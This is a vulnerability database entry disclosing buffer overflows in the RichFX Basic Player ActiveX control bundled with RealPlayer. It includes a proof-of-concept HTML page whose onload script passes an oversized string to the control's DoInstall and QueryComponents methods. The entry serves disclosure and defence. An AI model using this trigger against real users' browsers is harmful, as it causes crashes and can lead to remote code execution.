RichFX Basic Player 1.1 ActiveX Control Multiple Buffer Overflow Vulnerabilities

2014-07-01T00:00:00
ID SSV:84169
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/26573/info

RichFX Basic Player ActiveX Control is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

Note that RichFX Player ActiveX Control is installed by default with RealNetworks RealPlayer. It may be shipped with other RealNetworks products as well. 

<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
    var s = "AAAA";

    while (s.length < 999999) s=s+s;

     var obj = new ActiveXObject("RFXInstMgr.RFXInstMgr"); //{47F59200-8783-11D2-8343-00A0C945A819}


     obj.DoInstall(s);
     obj.QueryComponents(s);

   }
  </script>

 </head>
 <body onload="JavaScript: return Check();">

 </body>
</html>